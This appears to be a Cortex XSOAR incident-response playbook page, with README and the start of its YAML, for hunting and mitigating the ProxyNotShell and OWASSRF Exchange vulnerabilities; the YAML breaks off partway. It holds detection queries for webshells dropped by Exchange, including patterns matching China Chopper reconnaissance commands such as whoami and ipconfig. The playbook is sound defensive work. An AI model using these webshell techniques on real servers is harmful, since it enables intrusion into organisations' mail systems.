CVE-2022-41040 & CVE-2022-41082 - ProxyNotShell

**UPDATE** A new method for bypassing ProxyNotShell mitigations was found after being seen exploited in the wild by the Play ransomware gang. While the original exploit took advantage of the Autodiscover endpoint, the new exploit is using the OWA endpoint leading to SSRF. The OWASSRF exploit method involves two different vulnerabilities tracked by CVE-2022-41080 and CVE-2022-41082 that allow remote code execution (RCE) via Outlook Web Access (OWA). This playbook introduces several updates in response to the new discovery: - Hunting: - Detecting possibly successful exploitation of the OWA SSRF vulnerability. - Mitigations: - IIS URL Rewrite rule for the modified exploitation URI path. - Remediation: - Block Indicators - Generic v3 playbook. Microsoft is investigating two reported zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. The first one, identified as CVE-2022-41040, is a Server-Side Request Forgery (SSRF) vulnerability, and the second one, identified as CVE-2022-41082, allows Remote Code Execution (RCE) when PowerShell is accessible to the attacker. Currently, Microsoft is aware of limited targeted attacks using these two vulnerabilities. In these attacks, CVE-2022-41040 can enable an authenticated attacker to remotely trigger CVE-2022-41082. It should be noted that authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability. This playbook includes the following tasks: * Collect detection rules, indicators and mitigation tools. * Exploitation patterns hunting using Cortex XDR - XQL Engine. * Exploitation patterns hunting using 3rd party SIEM products: * Azure Sentinel * Splunk * QRadar * Elasticsearch * Indicators hunting using: * PAN-OS * Splunk * QRadar * Provides Microsoft mitigation and detection capabilities. **More information:** [Threat Brief: OWASSRF Vulnerability Exploitation](https://unit42.paloaltonetworks.com/threat-brief-OWASSRF/) [Threat Brief: CVE-2022-41040 and CVE-2022-41082: Microsoft Exchange Server (ProxyNotShell)](https://unit42.paloaltonetworks.com/proxynotshell-cve-2022-41040-cve-2022-41082/) **References:** [OWASSRF: CrowdStrike Identifies New Exploit Method for Exchange Bypassing ProxyNotShell Mitigations](https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/) [Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082](https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/) [Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server](https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/) [WARNING: NEW ATTACK CAMPAIGN UTILIZED A NEW 0-DAY RCE VULNERABILITY ON MICROSOFT EXCHANGE SERVER](https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html) [ProxyNotShell— the story of the claimed zero days in Microsoft Exchange](https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9) **Note:** This is a beta playbook, which lets you implement and test pre-release software. Since the playbook is beta, it might contain bugs. Updates to the pack during the beta phase might include non-backward compatible features. We appreciate your feedback on the quality and usability of the pack to help us identify issues, fix them, and continually improve.

CVE-2022-41040 & CVE-2022-41082 - ProxyNotShell · 76 tasks · 9 inputs · 0 outputs

Details

IDCVE-2022-41040 & CVE-2022-41082 - ProxyNotShell
From Version6.5.0
Tasks76

README

UPDATE
A new method for bypassing ProxyNotShell mitigations was found after being seen exploited in the wild by the Play ransomware gang.
While the original exploit took advantage of the Autodiscover endpoint, the new exploit is using the OWA endpoint leading to SSRF.
The OWASSRF exploit method involves two different vulnerabilities tracked by CVE-2022-41080 and CVE-2022-41082 that allow remote code execution (RCE) via Outlook Web Access (OWA).

This playbook introduces several updates in response to the new discovery:

  • Hunting:
    • Detecting possibly successful exploitation of the OWA SSRF vulnerability.
  • Mitigations:
    • IIS URL Rewrite rule for the modified exploitation URI path.
  • Remediation:
    • Block Indicators - Generic v3 playbook.

Microsoft is investigating two reported zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. The first one, identified as CVE-2022-41040, is a Server-Side Request Forgery (SSRF) vulnerability, and the second one, identified as CVE-2022-41082, allows Remote Code Execution (RCE) when PowerShell is accessible to the attacker.

Currently, Microsoft is aware of limited targeted attacks using these two vulnerabilities. In these attacks, CVE-2022-41040 can enable an authenticated attacker to remotely trigger CVE-2022-41082. It should be noted that authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability.

This playbook includes the following tasks:

  • Collect detection rules, indicators and mitigation tools.
  • Exploitation patterns hunting using Cortex XDR - XQL Engine.
  • Exploitation patterns hunting using 3rd party SIEM products:
    • Azure Sentinel
    • Splunk
    • QRadar
    • Elasticsearch
  • Indicators hunting using:
    • PAN-OS
    • Splunk
    • QRadar
  • Provides Microsoft mitigation and detection capabilities.

More information:

Threat Brief: OWASSRF Vulnerability Exploitation

Threat Brief: CVE-2022-41040 and CVE-2022-41082: Microsoft Exchange Server (ProxyNotShell)

References:

OWASSRF: CrowdStrike Identifies New Exploit Method for Exchange Bypassing ProxyNotShell Mitigations

Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082

Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server

WARNING: NEW ATTACK CAMPAIGN UTILIZED A NEW 0-DAY RCE VULNERABILITY ON MICROSOFT EXCHANGE SERVER

ProxyNotShell— the story of the claimed zero days in Microsoft Exchange

Note: This is a beta playbook, which lets you implement and test pre-release software. Since the playbook is beta, it might contain bugs. Updates to the pack during the beta phase might include non-backward compatible features. We appreciate your feedback on the quality and usability of the pack to help us identify issues, fix them, and continually improve.

Dependencies

This playbook uses the following sub-playbooks, integrations, and scripts.

Sub-playbooks

  • Block Indicators - Generic v3
  • PAN-OS Query Logs For Indicators
  • QRadar Indicator Hunting V2
  • Detect suspicious ASPX file dropped by Exchange
  • Rapid Breach Response - Set Incident Info
  • Detect Chopper Webshell process pattern
  • Detect a possibly successful ProxyNotShell bypass attempt
  • Splunk Indicator Hunting

Integrations

This playbook does not use any integrations.

Scripts

  • ParseHTMLIndicators
  • HttpV2
  • http

Commands

  • splunk-search
  • extractIndicators
  • associateIndicatorsToIncident
  • closeInvestigation
  • xdr-xql-generic-query
  • createNewIndicator
  • azure-log-analytics-execute-query
  • qradar-search-results-get
  • qradar-search-create
  • search

Playbook Inputs


Name Description Default Value Required
CVEs The vulnerabilities CVE indicators. CVE-2022-41040,CVE-2022-41082 Optional
SplunkIndex Splunk’s index name in which to search. The default is “*” - All. * Optional
SplunkEarliestTime Splunk’s earliest time to search. -7d@d Optional
SplunkLatestTime Splunk’s latest time to search. now Optional
ElasticIndex Elastic’s index name in which to search. The default is “winlogbeat-*” - All. winlogbeat-* Optional
QRadarTimeRange QRadar’s query time range. Last 7 DAYS Optional
RunXQLHuntingQueries Whether to execute the XQL queries. False Optional
XQLHuntingQueriesType Whether to execute the ProxyNotShell or OWASSRF XQL queries or both.

* Use ‘ProxyNotShell’ as an input to execute ProxyNotShell queries
* Use ‘OWASSRF’ as an input to execute OWASSRF queries
* Use ‘Both’ as an input to execute both ProxyNotShell and OWASSRF queries
OWASSRF Optional
PlaybookDescription The playbook’s description. UPDATE
A new method for bypassing ProxyNotShell mitigations was found after being seen exploited in the wild by the Play ransomware gang.
While the original exploit took advantage of the Autodiscover endpoint, the new exploit is using the OWA endpoint leading to SSRF.
The OWASSRF exploit method involves two different vulnerabilities tracked by CVE-2022-41080 and CVE-2022-41082 that allow remote code execution (RCE) via Outlook Web Access (OWA).

This playbook introduces several updates in response to the new discovery:
- Hunting:
- Detecting possibly successful exploitation of the OWA SSRF vulnerability.
- Mitigations:
- IIS URL Rewrite rule for the modified exploitation URI path.
- Remediation:
- Block Indicators - Generic v3 playbook.

Microsoft is investigating two reported zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. The first one, identified as CVE-2022-41040, is a Server-Side Request Forgery (SSRF) vulnerability, and the second one, identified as CVE-2022-41082, allows Remote Code Execution (RCE) when PowerShell is accessible to the attacker.

Currently, Microsoft is aware of limited targeted attacks using these two vulnerabilities. In these attacks, CVE-2022-41040 can enable an authenticated attacker to remotely trigger CVE-2022-41082. It should be noted that authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability.

This playbook includes the following tasks:

* Collect detection rules, indicators and mitigation tools.
* Exploitation patterns hunting using Cortex XDR - XQL Engine.
* Exploitation patterns hunting using 3rd party SIEM products:
* Azure Sentinel
* Splunk
* QRadar
* Elasticsearch
* Indicators hunting using:
* PAN-OS
* Splunk
* QRadar
* Provides Microsoft mitigation and detection capabilities.

More information:

Threat Brief: OWASSRF Vulnerability Exploitation

Threat Brief: CVE-2022-41040 and CVE-2022-41082: Microsoft Exchange Server (ProxyNotShell)

References:

OWASSRF: CrowdStrike Identifies New Exploit Method for Exchange Bypassing ProxyNotShell Mitigations

Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082

Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server

WARNING: NEW ATTACK CAMPAIGN UTILIZED A NEW 0-DAY RCE VULNERABILITY ON MICROSOFT EXCHANGE SERVER

ProxyNotShell— the story of the claimed zero days in Microsoft Exchange

Note: This is a beta playbook, which lets you implement and test pre-release software. Since the playbook is beta, it might contain bugs. Updates to the pack during the beta phase might include non-backward compatible features. We appreciate your feedback on the quality and usability of the pack to help us identify issues, fix them, and continually improve.
Optional

Playbook Outputs


There are no outputs for this playbook.

Playbook Image


CVE-2022-41040 & CVE-2022-41082 - ProxyNotShell

Inputs

  • CVEs — The vulnerabilities CVE indicators.
  • SplunkIndex — Splunk's index name in which to search. The default is "*" - All.
  • SplunkEarliestTime — Splunk's earliest time to search.
  • SplunkLatestTime — Splunk's latest time to search.
  • ElasticIndex — Elastic's index name in which to search. The default is "winlogbeat-*" - All.
  • QRadarTimeRange — QRadar's query time range.
  • RunXQLHuntingQueries — Whether to execute the XQL queries.
  • XQLHuntingQueriesType — Whether to execute the ProxyNotShell or OWASSRF XQL queries or both. * Use 'ProxyNotShell' as an input to execute ProxyNotShell queries * Use 'OWASSRF' as an input to execute OWASSRF queries * Use 'Both' as an input to execute both ProxyNotShell and OWASSRF queries
  • PlaybookDescription — The playbook's description.

Commands used

associateIndicatorsToIncident azure-log-analytics-execute-query closeInvestigation createNewIndicator extractIndicators qradar-search-create qradar-search-results-get search splunk-search xdr-xql-generic-query

Flowchart

Yes yes No Yes yes yes yes yes yes yes yes QRadar v2 QRadar v2 QRadar v2 QRadar v3 QRadar v3 QRadar v3 Yes Yes Yes Yes Yes Yes Both OWASSRF ProxyNotShell Start Start China Chopper webshell detection - http China Chopper webshell de... http Collect Detection Rules Collect Detection Rules Threat Hunting Threat Hunting SIEM Advanced Hunting SIEM Advanced Hunting Detect suspicious ASPX file dropped by Exchange - splunk-search Detect suspicious ASPX fi... splunk-search Detect suspicious ASPX file dropped by Exchange - QRadarFullSearch Detect suspicious ASPX fi... QRadarFullSearch Detect Chopper Webshell process pattern - search Detect Chopper Webshell p... search Cortex XDR - XQL Hunting Queries Cortex XDR - XQL Hunting ... Should run XQL hunting queries? Should run XQL hunting qu... Check if Cortex XDR - XQL Query Engine is Enabled Check if Cortex XDR - XQL... Splunk Indicator Hunting - Splunk Indicator Hunting Splunk Indicator Hunting Splunk Indicator Hunting QRadar Indicator Hunting V2 - QRadar Indicator Hunting V2 QRadar Indicator Hunting V2 QRadar Indicator Hunting V2 Remediation Remediation Recommended Workarounds Recommended Workarounds Deploy Detection Rules Deploy Detection Rules Detect certutil netcons to public IP addresses - xdr-xql-generic-query Detect certutil netcons t... xdr-xql-generic-query Exchange On-premises Mitigation Tool v2 - HttpV2 Exchange On-premises Miti... HttpV2 Sigma Rules Sigma Rules Analysis resolution - Should continue with the investigation? Analysis resolution - Sho... Done Done Investigate Further Investigate Further Close Investigation - closeInvestigation Close Investigation closeInvestigation Resolution Resolution Detect Chopper Webshell process pattern - splunk-search Detect Chopper Webshell p... splunk-search Detect DLL and EXE writes to Public folder on Exchange/IIS hosts - xdr-xql-generic-query Detect DLL and EXE writes... xdr-xql-generic-query Collect Indicators Collect Indicators Extract Indicators Extract Indicators Extract Indicators From Data Collected - extractIndicators Extract Indicators From D... extractIndicators Tag and Link Indicators Tag and Link Indicators Link Indicators To Incident - associateIndicatorsToIncident Link Indicators To Incident associateIndicatorsToIncident Tag File indicators - createNewIndicator Tag File indicators createNewIndicator Tag CVE indicators - createNewIndicator Tag CVE indicators createNewIndicator Tag Domain indicators - createNewIndicator Tag Domain indicators createNewIndicator Detect Chopper Webshell process pattern - QRadarFullSearch Detect Chopper Webshell p... QRadarFullSearch Webshell dropped by exchange detection - http Webshell dropped by excha... http Tag IP indicators - createNewIndicator Tag IP indicators createNewIndicator Tag URL indicators - createNewIndicator Tag URL indicators createNewIndicator Detect suspicious ASPX file dropped by Exchange - search Detect suspicious ASPX fi... search Is Azure Log Analytics Enabled? Is Azure Log Analytics En... Detect Exchange SSRF Autodiscover ProxyShell - azure-log-analytics-execute-query Detect Exchange SSRF Auto... azure-log-analytics-execute-q... Detect Exchange server suspicious file downloads - azure-log-analytics-execute-query Detect Exchange server su... azure-log-analytics-execute-q... Detect Exchange worker process making remote call - azure-log-analytics-execute-query Detect Exchange worker pr... azure-log-analytics-execute-q... Detect suspicious ASPX file dropped by Exchange - azure-log-analytics-execute-query Detect suspicious ASPX fi... azure-log-analytics-execute-q... Detect Exchange IIS worker dropping webshell - azure-log-analytics-execute-query Detect Exchange IIS worke... azure-log-analytics-execute-q... Detect Chopper Webshell process pattern - azure-log-analytics-execute-query Detect Chopper Webshell p... azure-log-analytics-execute-q... Cortex XDR Advanced Hunting Cortex XDR Advanced Hunting Azure Sentinel Advanced Hunting Azure Sentinel Advanced H... Detection of China Chopper webshell activity - xdr-xql-generic-query Detection of China Choppe... xdr-xql-generic-query Detect suspicious files in Exchange directories - xdr-xql-generic-query Detect suspicious files i... xdr-xql-generic-query Download Mitigation Tools Download Mitigation Tools Mitigate IIS URL Rewrite - ProxyNotShell Mitigate IIS URL Rewrite ... Is QRadar Enabled? Is QRadar Enabled? Is Splunk Enabled? Is Splunk Enabled? Is Elasticsearch Enabled? Is Elasticsearch Enabled? Set Rapid Breach Response Layout Set Rapid Breach Response... Rapid Breach Response - Set Incident Info - Rapid Breach Response - Set Incident Info Rapid Breach Response - S... Rapid Breach Response - Set I... Detect Chopper Webshell process pattern - qradar-search-create Detect Chopper Webshell p... qradar-search-create Detect suspicious ASPX file dropped by Exchange - qradar-search-create Detect suspicious ASPX fi... qradar-search-create QRadar fetch query results - qradar-search-results-get QRadar fetch query results qradar-search-results-get PAN-OS Query Logs For Indicators - PAN-OS Query Logs For Indicators PAN-OS Query Logs For Ind... PAN-OS Query Logs For Indicators Detect a possibly successful ProxyNotShell bypass attempt. - splunk-search Detect a possibly success... splunk-search Detect a possibly successful ProxyNotShell bypass attempt. - search Detect a possibly success... search Detect a possibly successful ProxyNotShell bypass attempt - QRadarFullSearch Detect a possibly success... QRadarFullSearch Detect a possibly successful ProxyNotShell bypass attempt. - qradar-search-create Detect a possibly success... qradar-search-create Detect possibly successful ProxyNotShell bypass - OWASSRF - azure-log-analytics-execute-query Detect possibly successfu... azure-log-analytics-execute-q... Mitigate IIS URL Rewrite - OWASSRF - ProxyNotShell bypass Mitigate IIS URL Rewrite ... Block Indicators - Generic v3 - Block Indicators - Generic v3 Block Indicators - Generi... Block Indicators - Generic v3 Collect indicators from SOCRadar - ParseHTMLIndicators Collect indicators from S... ParseHTMLIndicators Collect indicators from PANW Unit42 - ParseHTMLIndicators Collect indicators from P... ParseHTMLIndicators ProxyNotShell XQL Queries ProxyNotShell XQL Queries Choose which XQL queries to execute Choose which XQL queries ... OWASSRF XQL Queries OWASSRF XQL Queries Detect w3wp.exe suspicious child processes - xdr-xql-generic-query Detect w3wp.exe suspiciou... xdr-xql-generic-query Detect w3wp.exe spawning PowerShell with 'frombase64string' in the command-line - xdr-xql-generic-query Detect w3wp.exe spawning... xdr-xql-generic-query ProxyNotShell & OWASSRF XQL Queries ProxyNotShell & OWASSRF X...
id: CVE-2022-41040 & CVE-2022-41082 - ProxyNotShell
version: -1
name: CVE-2022-41040 & CVE-2022-41082 - ProxyNotShell
description: "**UPDATE**\nA new method for bypassing ProxyNotShell mitigations was found after being seen exploited in the wild by the Play ransomware gang.\nWhile the original exploit took advantage of the Autodiscover endpoint, the new exploit is using the OWA endpoint leading to SSRF.\nThe OWASSRF exploit method involves two different vulnerabilities tracked by CVE-2022-41080 and CVE-2022-41082 that allow remote code execution (RCE) via Outlook Web Access (OWA).\n\nThis playbook introduces several updates in response to the new discovery:\n- Hunting:\n    - Detecting possibly successful exploitation of the OWA SSRF vulnerability.\n- Mitigations:\n    - IIS URL Rewrite rule for the modified exploitation URI path.\n- Remediation:\n    - Block Indicators - Generic v3 playbook.\n\nMicrosoft is investigating two reported zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. The first one, identified as CVE-2022-41040, is a Server-Side Request Forgery (SSRF) vulnerability, and the second one, identified as CVE-2022-41082, allows Remote Code Execution (RCE) when PowerShell is accessible to the attacker.  \n\nCurrently, Microsoft is aware of limited targeted attacks using these two vulnerabilities.  In these attacks, CVE-2022-41040 can enable an authenticated attacker to remotely trigger CVE-2022-41082. It should be noted that authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability.\n\nThis playbook includes the following tasks:\n\n* Collect detection rules, indicators and mitigation tools.\n* Exploitation patterns hunting using Cortex XDR - XQL Engine.\n* Exploitation patterns hunting using 3rd party SIEM products:\n    * Azure Sentinel\n    * Splunk\n    * QRadar\n    * Elasticsearch\n* Indicators hunting using:\n    * PAN-OS\n    * Splunk\n    * QRadar\n* Provides Microsoft mitigation and detection capabilities.\n\n**More information:**\n\n[Threat Brief: OWASSRF Vulnerability Exploitation](https://unit42.paloaltonetworks.com/threat-brief-OWASSRF/)\n\n[Threat Brief: CVE-2022-41040 and CVE-2022-41082: Microsoft Exchange Server (ProxyNotShell)](https://unit42.paloaltonetworks.com/proxynotshell-cve-2022-41040-cve-2022-41082/)\n\n**References:**\n\n[OWASSRF: CrowdStrike Identifies New Exploit Method for Exchange Bypassing ProxyNotShell Mitigations](https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/)\n\n[Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082](https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/)\n\n[Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server](https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/)\n\n[WARNING: NEW ATTACK CAMPAIGN UTILIZED A NEW 0-DAY RCE VULNERABILITY ON MICROSOFT EXCHANGE SERVER](https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html)\n\n[ProxyNotShell— the story of the claimed zero days in Microsoft Exchange](https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9)\n\n**Note:** This is a beta playbook, which lets you implement and test pre-release software. Since the playbook is beta, it might contain bugs. Updates to the pack during the beta phase might include non-backward compatible features. We appreciate your feedback on the quality and usability of the pack to help us identify issues, fix them, and continually improve."
starttaskid: "0"
tasks:
  "0":
    id: "0"
    taskid: accab960-058c-40dc-8b00-3eb7e035f3b4
    type: start
    task:
      id: accab960-058c-40dc-8b00-3eb7e035f3b4
      version: -1
      name: ""
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "2"
      - "33"
      - "58"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": -680
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "1":
    id: "1"
    taskid: 4f5c7a7e-3ee4-4743-852f-0852b7ca74a1
    type: regular
    task:
      id: 4f5c7a7e-3ee4-4743-852f-0852b7ca74a1
      version: -1
      name: China Chopper webshell detection
      description: Download Sigma Rules
      scriptName: http
      type: regular
      iscommand: false
      brand: ""
    nexttasks:
      '#none#':
      - "35"
    scriptarguments:
      filename:
        simple: proc_creation_win_webshell_chopper.yml
      method:
        simple: GET
      saveAsFile:
        simple: "yes"
      url:
        simple: https://raw.githubusercontent.com/SigmaHQ/sigma/master/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -750,
          "y": -390
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "2":
    id: "2"
    taskid: 8fc5ddd6-6767-4279-8a0d-a8a6b9569dde
    type: title
    task:
      id: 8fc5ddd6-6767-4279-8a0d-a8a6b9569dde
      version: -1
      name: Collect Detection Rules
      type: title
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "1"
      - "43"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -750,
          "y": -530
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "3":
    id: "3"
    taskid: e3c7a793-d60c-48ab-8667-a467de7f8b85
    type: title
    task:
      id: e3c7a793-d60c-48ab-8667-a467de7f8b85
      version: -1
      name: Threat Hunting
      type: title
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "4"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 860
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "4":
    id: "4"
    taskid: 3eacb1f5-526c-4195-8917-70a9b8c55461
    type: title
    task:
      id: 3eacb1f5-526c-4195-8917-70a9b8c55461
      version: -1
      name: SIEM Advanced Hunting
      type: title
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "60"
      - "61"
      - "62"
      - "70"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 1000
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "7":
    id: "7"
    taskid: d4e09e34-a17b-4dc0-8e7f-75c05d7416c7
    type: regular
    task:
      id: d4e09e34-a17b-4dc0-8e7f-75c05d7416c7
      version: -1
      name: Detect suspicious ASPX file dropped by Exchange
      description: |-
        Detects suspicious file types dropped by an Exchange component in IIS into a suspicious folder.

        **Author:** Florian Roth (rule), MSTI (query, idea)

        **Status:** experimental

        **References:**
           - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/
           - https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html
           - https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html
      tags:
      - SIEMResults
      script: '|||splunk-search'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "17"
    scriptarguments:
      earliest_time:
        complex:
          root: inputs.SplunkEarliestTime
      latest_time:
        complex:
          root: inputs.SplunkLatestTime
      query:
        simple: source="WinEventLog:*" AND (Image="*\\w3wp.exe" AND CommandLine="*MSExchange*" AND (TargetFilename="*FrontEnd\\HttpProxy\\*" OR TargetFilename="*\\inetpub\\wwwroot\\aspnet_client\\*") AND (TargetFilename="*.aspx" OR TargetFilename="*.asp" OR TargetFilename="*.ashx"))
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -90,
          "y": 1400
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "8":
    id: "8"
    taskid: 8ac20155-372a-4b63-8053-5900058c4d69
    type: playbook
    task:
      id: 8ac20155-372a-4b63-8053-5900058c4d69
      version: -1
      name: Detect suspicious ASPX file dropped by Exchange
      description: This playbook runs a QRadar query and return its results to the context.
      playbookName: QRadarFullSearch
      type: playbook
      iscommand: false
      brand: ""
    nexttasks:
      '#none#':
      - "18"
    scriptarguments:
      interval:
        simple: "1"
      query_expression:
        simple: SELECT UTF8(payload) from events where LOGSOURCETYPENAME(devicetype)='Microsoft Windows Security Event Log' and (CATEGORYNAME(category) ILIKE 'File Created' or CATEGORYNAME(category) ILIKE 'Successful File Modification') and "Image" ilike '%\w3wp.exe' and "Process CommandLine" ilike '%MSExchange%' and ("Filename" ilike '%FrontEnd\HttpProxy\%' or "Filename" ilike '%\inetpub\wwwroot\aspnet_client\%') and ("Filename" ilike '%.aspx' or "Filename" ilike '%.asp' or "Filename" ilike '%.ashx')
      timeout:
        simple: "600"
    separatecontext: true
    continueonerrortype: ""
    loop:
      iscommand: false
      exitCondition: ""
      wait: 1
      max: 0
    view: |-
      {
        "position": {
          "x": -2240,
          "y": 1400
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "9":
    id: "9"
    taskid: 075e3b82-2069-4725-8b46-479866e1e8bf
    type: regular
    task:
      id: 075e3b82-2069-4725-8b46-479866e1e8bf
      version: -1
      name: Detect Chopper Webshell process pattern
      description: |-
        Detects patterns in process executions caused by China Chopper-like tiny (ASPX) webshells.

        **Author:** Florian Roth (rule), MSTI (query)

        **Status:** experimental

        **References:**
            - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/
      tags:
      - SIEMResults
      script: '|||search'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "55"
    scriptarguments:
      index:
        complex:
          root: inputs.ElasticIndex
      query:
        simple: ((process.executable.text:*\\w3wp.exe OR process.parent.executable.text:*\\w3wp.exe)       AND process.command_line.text:(*&ipconfig&echo* OR *&quser&echo* OR *&whoami&echo*       OR *&c\:&echo* OR *&cd&echo* OR *&dir&echo* OR *&echo\ \[E\]* OR *&echo\ \[S\]*))
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": 470,
          "y": 1400
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "10":
    id: "10"
    taskid: 4dea62c9-9731-4332-8c66-1ed754e1fe96
    type: title
    task:
      id: 4dea62c9-9731-4332-8c66-1ed754e1fe96
      version: -1
      name: 'Cortex XDR - XQL Hunting Queries '
      type: title
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "12"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 2620
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "11":
    id: "11"
    taskid: 87793301-fbc4-482d-8824-c42b1715e886
    type: condition
    task:
      id: 87793301-fbc4-482d-8824-c42b1715e886
      version: -1
      name: Should run XQL hunting queries?
      description: Checks whether to execute XDR shell script for exploitation hunting.
      type: condition
      iscommand: false
      brand: ""
    nexttasks:
      '#default#':
      - "19"
      "Yes":
      - "82"
    separatecontext: false
    conditions:
    - label: "Yes"
      condition:
      - - operator: isEqualString
          left:
            value:
              complex:
                root: inputs.RunXQLHuntingQueries
            iscontext: true
          right:
            value:
              simple: "True"
          ignorecase: true
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 2930
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "12":
    id: "12"
    taskid: de00f16f-50f6-4f15-8154-2a5a49bd4754
    type: condition
    task:
      id: de00f16f-50f6-4f15-8154-2a5a49bd4754
      version: -1
      name: Check if Cortex XDR - XQL Query Engine is Enabled
      description: Returns 'yes' if integration brand is available. Otherwise returns 'no'
      type: condition
      iscommand: false
      brand: ""
    nexttasks:
      '#default#':
      - "19"
      "yes":
      - "11"
    separatecontext: false
    conditions:
    - label: "yes"
      condition:
      - - operator: isExists
          left:
            value:
              complex:
                root: modules
                filters:
                - - operator: isEqualString
                    left:
                      value:
                        simple: modules.brand
                      iscontext: true
                    right:
                      value:
                        simple: Cortex XDR - XQL Query Engine
                    ignorecase: true
                - - operator: isEqualString
                    left:
                      value:
                        simple: modules.state
                      iscontext: true
                    right:
                      value:
                        simple: active
                    ignorecase: true
            iscontext: true
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 2750
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "17":
    id: "17"
    taskid: 234bd644-ee3c-48c5-8d41-ddd866c68584
    type: playbook
    task:
      id: 234bd644-ee3c-48c5-8d41-ddd866c68584
      version: -1
      name: Splunk Indicator Hunting
      description: This playbook queries Splunk for indicators such as file hashes, IP addresses, domains, or urls. It outputs detected users, ip addresses, and hostnames related to the indicators.
      playbookName: Splunk Indicator Hunting
      type: playbook
